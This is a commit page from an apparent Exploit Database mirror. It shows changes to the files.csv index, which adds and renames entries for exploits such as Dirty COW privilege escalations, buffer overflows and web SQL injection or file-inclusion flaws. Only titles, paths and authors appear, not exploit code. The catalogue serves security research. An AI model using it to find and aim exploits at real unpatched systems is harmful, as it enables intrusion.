bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-11-29

Browse source 
16 new exploits

rdesktop 1.5.0 - iso_recv_msg() Integer Underflow (PoC)
rdesktop 1.5.0 - process_redirect_pdu() BSS Overflow (PoC)
rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC)
rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)
NTP 4.2.8p3 - Denial of Service
Microsoft Internet Explorer 8 MSHTML - 'SRun­Pointer::Span­Qualifier/Run­Type' Out-Of-Bounds Read (MS15-009)
Microsoft Internet Explorer 11 MSHTML - 'CGenerated­Content::Has­Generated­SVGMarker' Type Confusion
Microsoft Internet Explorer 10 MSHTML - 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)
Microsoft Internet Explorer 8 / 9 / 10 / 11 MSHTML - 'DOMImplementation' Type Confusion (MS16-009)

Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation
Linux Kernel 2.6.x < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation

Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Privilege Escalation
Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation
Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86_64) - 'compat' Privilege Escalation
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation

Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Privilege Escalation (1)
Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)

Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Privilege Escalation (2)
Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation

TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)
TFTP Server 1.4 - Remote Buffer Overflow (2)

TFTP Server 1.4 (Windows) - ST WRQ Buffer Overflow (Metasploit)
TFTP Server 1.4 - ST WRQ Buffer Overflow (Metasploit)

Android - 'BadKernel' Remote Code Execution
VX Search Enterprise 9.1.12 - Buffer Overflow
Sync Breeze Enterprise 9.1.16 - Buffer Overflow
Disk Sorter Enterprise 9.1.12 - Buffer Overflow
Dup Scout Enterprise 9.1.14 - Buffer Overflow
Disk Savvy Enterprise 9.1.14 - Buffer Overflow
Disk Pulse Enterprise 9.1.16 - Buffer Overflow

Linux/x86 - Egg-hunter Shellcode (25 bytes)
Linux/x86 - Egg-hunter Shellcode (31 bytes)

RunCMS 1.2 - (class.forumposts.php) Arbitrary Remote File Inclusion
RunCMS 1.2 - 'class.forumposts.php' Arbitrary Remote File Inclusion

CMS Faethon 1.3.2 - (mainpath) Remote File Inclusion
CMS Faethon 1.3.2 - 'mainpath' Parameter Remote File Inclusion

CMS Faethon 2.0 - (mainpath) Remote File Inclusion
CMS Faethon 2.0 - 'mainpath' Parameter Remote File Inclusion

SazCart 1.5 - (cart.php) Remote File Inclusion
SazCart 1.5 - 'cart.php' Remote File Inclusion

Cyberfolio 2.0 RC1 - (av) Remote File Inclusion
Cyberfolio 2.0 RC1 - 'av' Parameter Remote File Inclusion

FipsCMS 4.5 - (index.asp) SQL Injection
FipsCMS 4.5 - 'index.asp' SQL Injection

AJ Classifieds 1.0 - (postingdetails.php) SQL Injection
AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection

RunCMS 1.5.2 - (debug_show.php) SQL Injection
RunCMS 1.5.2 - 'debug_show.php' SQL Injection

OneCMS 2.4 - (userreviews.php abc) SQL Injection
OneCMS 2.4 - 'abc' Parameter SQL Injection

RunCMS 1.6 - disclaimer.php Remote File Overwrite
RunCMS 1.6 - 'disclaimer.php' Remote File Overwrite
PHPEasyData 1.5.4 - 'cat_id' SQL Injection
FipsCMS - 'print.asp lg' SQL Injection
Galleristic 1.0 - (index.php cat) SQL Injection
gameCMS Lite 1.0 - (index.php systemId) SQL Injection
PHPEasyData 1.5.4 - 'cat_id' Parameter SQL Injection
FipsCMS 2.1 - 'print.asp' SQL Injection
Galleristic 1.0 - 'cat' Parameter SQL Injection
GameCMS Lite 1.0 - 'systemId' Parameter SQL Injection

CMS Faethon 2.2 Ultimate - (Remote File Inclusion / Cross-Site Scripting) Multiple Remote Vulnerabilities
CMS Faethon 2.2 Ultimate - Remote File Inclusion / Cross-Site Scripting
MusicBox 2.3.7 - (artistId) SQL Injection
RunCMS 1.6.1 - (msg_image) SQL Injection
MusicBox 2.3.7 - 'artistId' Parameter SQL Injection
RunCMS 1.6.1 - 'msg_image' Parameter SQL Injection

vShare YouTube Clone 2.6 - (tid) SQL Injection
vShare YouTube Clone 2.6 - 'tid' Parameter SQL Injection
Cyberfolio 7.12 - (rep) Remote File Inclusion
miniBloggie 1.0 - (del.php) Arbitrary Delete Post
Cyberfolio 7.12 - 'rep' Parameter Remote File Inclusion
miniBloggie 1.0 - 'del.php' Arbitrary Delete Post

SazCart 1.5.1 - (prodid) SQL Injection
SazCart 1.5.1 - 'prodid' Parameter SQL Injection

Phoenix View CMS Pre Alpha2 - (SQL Injection / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Phoenix View CMS Pre Alpha2 - SQL Injection / Local File Inclusion / Cross-Site Scripting

Ktools Photostore 3.5.1 - (gallery.php gid) SQL Injection
Ktools Photostore 3.5.1 - 'gid' Parameter SQL Injection

Joomla! Component com_datsogallery 1.6 - Blind SQL Injection
Joomla! Component Datsogallery 1.6 - Blind SQL Injection
Vortex CMS - 'index.php pageid' Blind SQL Injection
AJ Article 1.0 - (featured_article.php) SQL Injection
AJ Auction 6.2.1 - (classifide_ad.php) SQL Injection
Vortex CMS - 'pageid' Parameter Blind SQL Injection
AJ Article 1.0 - 'featured_article.php' SQL Injection
AJ Auction 6.2.1 - 'classifide_ad.php' SQL Injection

clanlite 2.x - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
ClanLite 2.x - SQL Injection / Cross-Site Scripting

OneCMS 2.5 - (install_mod.php) Local File Inclusion
OneCMS 2.5 - 'install_mod.php' Local File Inclusion
AJ Auction Web 2.0 - (cate_id) SQL Injection
AJ Auction 1.0 - 'id' SQL Injection
AJ Auction Web 2.0 - 'cate_id' Parameter SQL Injection
AJ Auction 1.0 - 'id' Parameter SQL Injection

FipsCMS Light 2.1 - (r) SQL Injection
FipsCMS Light 2.1 - 'r' Parameter SQL Injection

AJ Auction Pro Platinum Skin - 'detail.php item_id' SQL Injection
AJ Auction Pro Platinum Skin - 'item_id' Parameter SQL Injection

AJ Auction Pro Platinum - (seller_id) SQL Injection
AJ Auction Pro Platinum - 'seller_id' Parameter SQL Injection

miniBloggie 1.0 - (del.php) Blind SQL Injection
miniBloggie 1.0 - 'del.php' Blind SQL Injection

AJ Article - 'featured_article.php mode' SQL Injection

AJ ARTICLE - (Authentication Bypass) SQL Injection
AJ Article 1.0 - Authentication Bypass

Cyberfolio 7.12.2 - (css.php theme) Local File Inclusion
Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion

AJ ARTICLE - Remote Authentication Bypass
AJ Article 1.0 - Remote Authentication Bypass

MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection
MusicBox 2.3.8 - 'viewalbums.php' SQL Injection

AJ Auction Pro OOPD 2.3 - 'id' SQL Injection
AJ Auction Pro OOPD 2.3 - 'id' Parameter SQL Injection

BigACE CMS 2.5 - 'Username' SQL Injection
BigACE 2.5 - SQL Injection

ZeusCart 2.3 - 'maincatid' SQL Injection
ZeusCart 2.3 - 'maincatid' Parameter SQL Injection

BigACE CMS 2.6 - (cmd) Local File Inclusion
BigACE 2.6 - 'cmd' Parameter Local File Inclusion

RunCMS 1.6.3 - (double ext) Remote Shell Injection
RunCMS 1.6.3 - Remote Shell Injection

AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection
AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection
RunCMS 2m1 - store() SQL Injection
RunCMS 2ma - post.php SQL Injection
RunCMS 2m1 - 'store()' SQL Injection
RunCMS 2ma - 'post.php' SQL Injection

AJ Article - Persistent Cross-Site Scripting
AJ Article 3.0 - Cross-Site Scripting

admidio 2.3.5 - Multiple Vulnerabilities
Admidio 2.3.5 - Multiple Vulnerabilities

RunCMS 1.1/1.2 Newbb_plus and Messages Modules - Multiple SQL Injections
RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection

MusicBox 2.3 - Type Parameter SQL Injection
MusicBox 2.3 - 'type' Parameter SQL Injection

RunCMS 1.x - Bigshow.php Cross-Site Scripting
RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting

RunCMS 1.2/1.3 - PMLite.php SQL Injection
RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection

RunCMS 1.x - Ratefile.php Cross-Site Scripting
RunCMS 1.x - 'Ratefile.php' Cross-Site Scripting

BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)
BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)
MusicBox 2.3 - 'index.php' Multiple Parameter SQL Injection
MusicBox 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting
MusicBox 2.3 - cart.php Multiple Parameter Cross-Site Scripting
MusicBox 2.3 - 'index.php' SQL Injection
MusicBox 2.3 - 'index.php' Cross-Site Scripting
MusicBox 2.3 - 'cart.php' Cross-Site Scripting

MusicBox 2.3.4 - Page Parameter SQL Injection
MusicBox 2.3.4 - 'page' Parameter SQL Injection

MyWebland miniBloggie 1.0 - Fname Remote File Inclusion
miniBloggie 1.0 - 'Fname' Remote File Inclusion
BigACE 1.8.2 - item_main.php GLOBALS Parameter Remote File Inclusion
BigACE 1.8.2 - upload_form.php GLOBALS Parameter Remote File Inclusion
BigACE 1.8.2 - download.cmd.php GLOBALS Parameter Remote File Inclusion
BigACE 1.8.2 - admin.cmd.php GLOBALS Parameter Remote File Inclusion
BigACE 1.8.2 - 'item_main.php' Remote File Inclusion
BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion
BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion
BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion

ClanLite - Config-PHP.php Remote File Inclusion
ClanLite - 'conf-php.php' Remote File Inclusion

FipsCMS 2.1 - PID Parameter SQL Injection
FipsCMS 2.1 - 'pid' Parameter SQL Injection
RunCMS 1.6.1 - votepolls.php bbPath[path] Parameter Remote File Inclusion
RunCMS 1.6.1 - config.php bbPath[root_theme] Parameter Remote File Inclusion
RunCMS 1.6.1 - 'bbPath[path]' Parameter Remote File Inclusion
RunCMS 1.6.1 - 'bbPath[root_theme]' Parameter Remote File Inclusion

FipsCMS 2.1 - 'forum/neu.asp' SQL Injection
FipsCMS 2.1 - 'neu.asp' SQL Injection
OneCMS 2.6.1 - admin/admin.php cat Parameter Cross-Site Scripting
OneCMS 2.6.1 - search.php search Parameter SQL Injection
OneCMS 2.6.1 - admin/admin.php Short1 Parameter Cross-Site Scripting
OneCMS 2.6.1 - 'cat' Parameter Cross-Site Scripting
OneCMS 2.6.1 - 'search' Parameter SQL Injection
OneCMS 2.6.1 - 'short1' Parameter Cross-Site Scripting

RunCMS 'partners' Module - 'id' Parameter SQL Injection
RunCMS Module Partners - 'id' Parameter SQL Injection

Zeuscart v.4 - Multiple Vulnerabilities
Zeuscart 4.0 - Multiple Vulnerabilities

BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal
BigACE 2.7.5 - 'LANGUAGE' Parameter Directory Traversal
Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting
Red Hat JBoss EAP - Deserialization of Untrusted Data
This commit is contained in:
Offensive Security 2016-11-29 05:01:20 +00:00
parent b1cbed79e4
commit 91b12c469e
19 changed files with 1964 additions and 156 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

193
files.csv
View file

@ -729,8 +729,8 @@ id,file,description,date,author,platform,type,port
5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 - subtitle Buffer Overflow (PoC)",2008-04-19,grzdyl,windows,dos,0
5515,platforms/windows/dos/5515.txt,"Groupwise 7.0 - 'mailto: scheme' Buffer Overflow (PoC)",2008-04-28,"Juan Yacubian",windows,dos,0
5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers Denial of Service",2008-05-05,Nicob,windows,dos,0
5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - iso_recv_msg() Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos,0
5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - process_redirect_pdu() BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0
5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos,0
5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0
5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - sleep() Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - SaveToFile()File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
@ -5281,6 +5281,11 @@ id,file,description,date,author,platform,type,port
40814,platforms/hardware/dos/40814.txt,"TP-LINK TDDP - Multiple Vulnerabilities",2016-11-22,"Core Security",hardware,dos,1040
40815,platforms/windows/dos/40815.html,"Microsoft Internet Explorer 8 MSHTML - 'Ptls5::Ls­Find­Span­Visual­Boundaries' Memory Corruption",2016-11-22,Skylined,windows,dos,0
40828,platforms/windows/dos/40828.py,"Core FTP LE 2.2 - 'SSH/SFTP' Remote Buffer Overflow (PoC)",2016-11-27,hyp3rlinx,windows,dos,0
40840,platforms/linux/dos/40840.py,"NTP 4.2.8p3 - Denial of Service",2016-11-28,"Magnus Klaaborg Stubman",linux,dos,0
40841,platforms/windows/dos/40841.html,"Microsoft Internet Explorer 8 MSHTML - 'SRun­Pointer::Span­Qualifier/Run­Type' Out-Of-Bounds Read (MS15-009)",2016-11-28,Skylined,windows,dos,0
40843,platforms/windows/dos/40843.html,"Microsoft Internet Explorer 11 MSHTML - 'CGenerated­Content::Has­Generated­SVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos,0
40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 MSHTML - 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0
40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8 / 9 / 10 / 11 MSHTML - 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5437,7 +5442,7 @@ id,file,description,date,author,platform,type,port
713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",solaris,local,0
714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0
715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0
718,platforms/linux/local/718.c,"Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0
718,platforms/linux/local/718.c,"Linux Kernel 2.6.x < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0
739,platforms/bsd/local/739.c,"FreeBSD TOP - Format String",2001-07-23,truefinder,bsd,local,0
741,platforms/linux/local/741.pl,"HTGET 0.9.x - Privilege Escalation",2005-01-05,nekd0,linux,local,0
744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0
@ -5787,7 +5792,7 @@ id,file,description,date,author,platform,type,port
4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0
4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0
4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0
4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0
4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,solaris,local,0
4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,solaris,local,0
4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0
@ -6514,8 +6519,8 @@ id,file,description,date,author,platform,type,port
14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86_64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0
15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0
15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0
15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0
15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0
@ -7832,7 +7837,7 @@ id,file,description,date,author,platform,type,port
24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0
24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption",2013-02-15,"Julien Ahrens",windows,local,0
24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0
24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0
24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",linux,local,0
24578,platforms/osx/local/24578.rb,"Tunnelblick - Setuid Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
24579,platforms/osx/local/24579.rb,"Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
@ -7904,7 +7909,7 @@ id,file,description,date,author,platform,type,port
25961,platforms/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0
25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0
26100,platforms/linux/local/26100.sh,"Lantronix Secure Console Server SCS820/SCS1620 - Multiple Local Vulnerabilities",2005-08-05,c0ntex,linux,local,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0
26185,platforms/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0
26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0
26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,linux,local,0
@ -8636,8 +8641,8 @@ id,file,description,date,author,platform,type,port
40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation",2016-10-21,"Robin Verton",linux,local,0
40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0
40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
@ -8651,6 +8656,7 @@ id,file,description,date,author,platform,type,port
40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)",2016-10-26,"Phil Oester",linux,local,0
40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
@ -8660,6 +8666,7 @@ id,file,description,date,author,platform,type,port
40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0
40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0
40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation",2016-11-28,FireFart,linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -10073,7 +10080,7 @@ id,file,description,date,author,platform,type,port
10434,platforms/windows/remote/10434.py,"Savant Web Server 3.1 - Remote Buffer Overflow (3)",2009-12-14,DouBle_Zer0,windows,remote,80
10451,platforms/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - NetBiterConfig.exe Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",hardware,remote,0
10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL module Clientless URL-list control Bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0
10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69
10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Remote Buffer Overflow (2)",2009-12-18,Molotov,windows,remote,69
10579,platforms/multiple/remote/10579.py,"TLS - Renegotiation (PoC)",2009-12-21,"RedTeam Pentesting",multiple,remote,0
10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0
14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0
@ -11167,7 +11174,7 @@ id,file,description,date,author,platform,type,port
18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow (Metasploit)",2012-04-10,Metasploit,windows,remote,0
18735,platforms/windows/remote/18735.rb,"Quest InTrust - Annotation Objects Uninitialized Pointer (Metasploit)",2012-04-13,Metasploit,windows,remote,0
18738,platforms/php/remote/18738.rb,"V-CMS - Arbitrary .PHP File Upload / Execution (Metasploit)",2012-04-14,Metasploit,php,remote,0
18759,platforms/windows/remote/18759.rb,"TFTP Server 1.4 (Windows) - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,remote,0
18759,platforms/windows/remote/18759.rb,"TFTP Server 1.4 - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,remote,0
